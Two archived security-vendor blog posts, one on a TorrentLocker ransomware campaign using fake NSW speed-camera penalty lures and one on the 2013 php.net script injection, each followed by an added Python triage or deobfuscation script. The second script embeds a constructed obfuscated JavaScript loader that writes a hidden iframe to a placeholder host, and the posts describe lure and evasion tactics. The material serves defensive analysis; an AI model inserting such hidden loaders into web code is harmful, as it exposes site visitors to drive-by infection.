Ransomware - No Sign of Relief, Especially for Australians
Posted by Carl Leonard on 25 February 2015 01:20 PM
Websense® Security Labs™ researchers observed that ransomware was a plague in 2014 and this threat type shows no sign of relief in 2015. In this blog we profile the user experience for a Torrentlocker variant focusing on the Australian region.
Ransomware is an umbrella name for a type of cybercrime in which the attackers restrict access to a computer until a ransom is paid to restore system access and function. Crypto Ransomware is a form of ransomware in which access to data is blocked by encrypting the data and withholding an encryption key until a ransom is paid to the cyber criminals. (Authors' note: We do not recommend that a ransom is paid to the cyber criminals).
We have seen that Torrentlocker rotates through many themes/lures/targets and tends to be low volume and targeted.
In the latter half of 2014 we observed fake Royal Mail lures (targeting UK end-users) and Australia Post lures, but then Torrentlocker moved on to Turkish-themed lures (Turk Telekom, TTNET) and then New South Wales Government lures, of which we see a repeat in our current case study. There have also been Czech Post lures, TESA Telecom (Brazilian-themed) lures, Italian lures and others too. The lures tend to be fake 'eFax' or 'penalty' download pages.
Our case study, the Australian-themed ransomware, exhibits the typical process from lure to infection.
Ransomware is most often distributed via email lures or via web-based infection chains (compromised websites and malvertising). Today's case study used an initial email lure with a topic of penalties issued by speed cameras. A typical subject is "Penalty id number - <random number> / Fixed by speed camera".
The lure email contains a URL (in this case pointing at a compromised WordPress host). The end user is sent through to a website that presents a call to action:
In this case we see a Penalty Notice claiming to be from the New South Wales Office Of State Revenue. For the avoidance of doubt, the OSR is a legitimate organization and its website is hosted at http://www.osr.nsw.gov.au/. Social engineering is needed to convince the end user to perform an action. Note the use of a legitimate-looking logo as well as a CAPTCHA entry form to add a degree of legitimacy to the fraudulent website, and to encourage a further click action. Hosts of the fraudulent website rotate, but include hxxp://nsw.gov.yourpenalty.com/ and hxxp://osr.nsw.mypenalty.org/. In both cases the labels borrowed from the real site ("nsw.gov", "osr.nsw") appear only as subdomains of a domain the attackers registered themselves, which is the detail to check before trusting such a link. Similar variants on the theme will likely occur in the future.
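As an added example (not part of the original post, and not code from Websense), the following Python triage script turns the two indicators described above into checks an analyst could run over a mail log: the speed-camera subject format, and hosts that carry labels such as `nsw`, `gov` or `osr` while being registered under an unrelated domain. The two-label suffix list, the brand-label list and the sample messages are constructed assumptions for illustration; only the subject format and the two lure hosts come from the post.

```python
import re
from urllib.parse import urlsplit

# Lure subject format quoted in the post:
# "Penalty id number - <random number> / Fixed by speed camera"
SUBJECT_RE = re.compile(
    r"^\s*penalty id number\s*[-\u2013]\s*\d+\s*/\s*fixed by speed camera\s*$", re.I)

# Assumption: a short hand-made list of two-label public suffixes. A production
# tool would use the full Public Suffix List instead.
TWO_LABEL_SUFFIXES = {"gov.au", "com.au", "org.au", "co.uk"}

# Registrable domains the impersonated organisation really uses (assumption for the example).
LEGITIMATE_DOMAINS = {"nsw.gov.au"}

# Labels the lure borrows from the real site; their presence under a different
# registrable domain is the lookalike signal.
BRAND_LABELS = {"osr", "nsw", "gov"}


def refang(url):
    """Turn a defanged 'hxxp(s)://' URL back into one urlsplit can parse."""
    return re.sub(r"^hxxp", "http", url.strip(), flags=re.I)


def registrable_domain(host):
    """Return the part of the host somebody had to register (e.g. yourpenalty.com)."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_brand_lookalike(host):
    """True when brand labels appear in the host but the registrable domain is not a legitimate one."""
    if registrable_domain(host) in LEGITIMATE_DOMAINS:
        return False
    return bool(set(host.lower().split(".")) & BRAND_LABELS)


def triage(subject, urls):
    """Return the list of reasons a message looks like this lure (empty list = no hit)."""
    reasons = []
    if SUBJECT_RE.match(subject):
        reasons.append("subject matches the speed-camera penalty lure")
    for url in urls:
        host = urlsplit(refang(url)).hostname or ""
        if host and is_brand_lookalike(host):
            reasons.append(f"lookalike host {host} (registered as {registrable_domain(host)})")
    return reasons


# Constructed sample messages: the first two mirror the campaign described above,
# the third is a benign message linking to the real OSR site.
SAMPLE_MESSAGES = [
    ("Penalty id number - 4821937 / Fixed by speed camera", ["hxxp://nsw.gov.yourpenalty.com/"]),
    ("Penalty id number - 1103355 / Fixed by speed camera", ["hxxp://osr.nsw.mypenalty.org/"]),
    ("Your land tax assessment", ["http://www.osr.nsw.gov.au/"]),
]

if __name__ == "__main__":
    for subject, urls in SAMPLE_MESSAGES:
        print(subject, "->", triage(subject, urls) or "no indicators")
```

The subject check alone is weak (the attackers rotate themes, as the post notes), so the host check is the part worth keeping: it fires on any future hostname that nests government-looking labels under an attacker-registered domain, regardless of the lure text.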
Once the end user has been duped into clicking through, they are presented with a warning notice:
Decrypt instructions are provided via an HTML document installed on the user's machine. This points the user to yet another website where they are encouraged to perform a transaction:
As is typical, the decrypter service website offers two prices for decryption. If the end user pays promptly they have to pay 2.4 bitcoins (approximately 499 USD at the time of writing). If they pay after 3 days the price doubles to approximately 998 USD.
A timer is shown to encourage urgent action. The malicious website also reveals the number of files that have been encrypted. Instructions are provided if the user is unsure how to trade in Bitcoins.
As before, we do not recommend paying the cyber-criminals to decrypt the files. Success is not guaranteed. If you fear you may have encountered a ransomware website (at any stage of the threat lifecycle) you can check our view on that by submitting the site to our online CyberSecurity Intelligence website analysis tool at http://csi.websense.com/
This variant of Torrentlocker cycles through hosts with various country code Top Level Domains (ccTLDs). We observed .com, .at (Austria), .lt (Lithuania) and .ru (Russia). Variants included:
As mentioned above, the fraudulent OSR-themed websites also change frequently to make detection difficult without real-time detection technologies.
The Financial Services sector was the one most targeted by this particular campaign.
Protecting from Ransomware
Websense customers were protected at the time of this Australian-themed ransomware attack via real-time analytics within ACE, our Advanced Classification Engine. Protection is offered at the different stages of the attack detailed below:
Our File Sandboxing tool classifies the ransomware payload as Malicious in the report here.
At the time of writing (25 February 2015) the file sample has a detection rate of only 3 out of 57 anti-virus vendors in VirusTotal.
Ransomware will continue to evolve as we progress through 2015. Once a machine has become infected and files encrypted there is little that an end user can do to counter it beyond restoring from offline backups. To strengthen your overall security posture we recommend that you raise awareness within your employee base of the dangers and signs of ransomware, and adopt suitable technologies to identify and protect from the threat in the early stages of the threat lifecycle.
Blog Contributors: Mark Haffenden, Nicholas Griffin, Carl Leonard.
PHP.net compromised, serving up obfuscated content
Posted by Drendell_ on 25 October 2013 01:21 PM
The Websense® ThreatSeeker® Intelligence Cloud has alerted us regarding malicious content deployed on hxxp://php.net/, the PHP language project's website.
Internet users may know that Google Safe Browsing has also alerted users to a possible infection or compromise of php.net, a site currently ranked 220 by Alexa. A member of Google's staff has posted on a number of forums (examples here and here) to confirm that this is, in fact, a true positive, which our telemetry also confirms. Members of the same forums quickly compared versions of the script, identifying the following code as appended to at least 4 .js scripts within the hxxp://php.net/ domain:
The following screen shot shows the decoded obfuscation:
The iframe source was hosted on a VPS owned by hxxp://webfusion.co.uk/, which should be applauded for swiftly taking the site down soon after this compromise came to light. Before the takedown, the URL returned one of two types of content: a basic plugin detection script, or the simple string "not ready", as shown below:
The malicious code was served only once per client IP address, and only when the request carried the expected Referer and User-Agent strings. Any later request from the same address, or one without those headers, received the "not ready" response, so an analyst who re-fetches the URL from the same box sees nothing and has to rely on the first capture.
The ultimate goal of this injection was to redirect users to the Magnitude Exploit Kit (MEK), which attempts to exploit Adobe and Java platforms, among others, in order to serve up generic ransomware.
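As an added example (not code from php.net, from the attackers, or from Websense), the following Python script reproduces the kind of check the forum members performed on the php.net scripts: diff the served .js against a known-good copy, score the appended tail for obfuscation markers, peel common static encodings (String.fromCharCode, unescape/%XX, \xHH) until the text stops changing, and pull out any iframe sources. The clean file, the appended loader and the example.invalid host are constructed for this example; the real injected code is not reproduced here.

```python
import re
from urllib.parse import unquote

# Constructs that legitimate site scripts rarely chain together but injected loaders do.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode(", "document.write(", "\\x")

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]*)\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
UNICODE_PCT_RE = re.compile(r"%u([0-9a-fA-F]{4})")
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def appended_code(clean_js, served_js):
    """Return the text appended to a known-good file ('' if identical, None if it differs elsewhere)."""
    if served_js.startswith(clean_js):
        return served_js[len(clean_js):]
    return None


def obfuscation_score(js):
    """Count occurrences of constructs typical of injected loaders."""
    return sum(js.count(marker) for marker in OBFUSCATION_MARKERS)


def _js_unescape(s):
    # JavaScript unescape() handles %uXXXX as well as %XX; urllib only does the latter.
    s = UNICODE_PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_layer(js):
    """Replace one layer of static string encodings with their plaintext."""
    js = FROMCHARCODE_RE.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + '"', js)
    js = UNESCAPE_RE.sub(lambda m: '"' + _js_unescape(m.group(2)) + '"', js)
    js = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return js


def deobfuscate(js, max_rounds=8):
    """Apply decode_layer until the text stops changing (nested encodings need several rounds)."""
    for _ in range(max_rounds):
        decoded = decode_layer(js)
        if decoded == js:
            break
        js = decoded
    return js


def analyse(clean_js, served_js):
    """Full check: what was appended, how obfuscated it looks, and where any iframe points."""
    tail = appended_code(clean_js, served_js)
    if not tail:
        return {"appended": tail, "score": 0, "decoded": "", "iframe_srcs": []}
    decoded = deobfuscate(tail)
    return {"appended": tail, "score": obfuscation_score(tail),
            "decoded": decoded, "iframe_srcs": IFRAME_SRC_RE.findall(decoded)}


# Constructed sample: a harmless "clean" script and an appended loader that builds a
# hidden iframe from String.fromCharCode and unescape. The host is a placeholder.
CLEAN_JS = "function ready(fn) { if (document.readyState !== 'loading') { fn(); } }\n"
INJECTED_JS = (
    "var _q = String.fromCharCode(60,105,102,114,97,109,101,32) + "
    'unescape("src%3D%22http%3A%2F%2Fexample.invalid%2Fin.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E");\n'
    "document.write(_q);\n"
)
SERVED_JS = CLEAN_JS + INJECTED_JS

if __name__ == "__main__":
    result = analyse(CLEAN_JS, SERVED_JS)
    print("appended bytes:", len(result["appended"]), "score:", result["score"])
    print("decoded:", result["decoded"])
    print("iframe sources:", result["iframe_srcs"])
```

The known-good copy is the important input: for a site whose scripts live in version control, the pristine file comes from the repository rather than from the web server, so a tampered server cannot also supply the baseline. Because the second-stage URL was gated per IP and on Referer/User-Agent, the decoded iframe source should be recorded from the first capture rather than re-fetched for confirmation.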
Websense customers were, as always, protected against this type of attack by ACE™, our Advanced Classification Engine.
Of the 7 Stages of Advanced Threats, Websense offered protection at the following stages:
Update (at the time of this blog posting): The malicious code has been removed from hxxp://php.net/.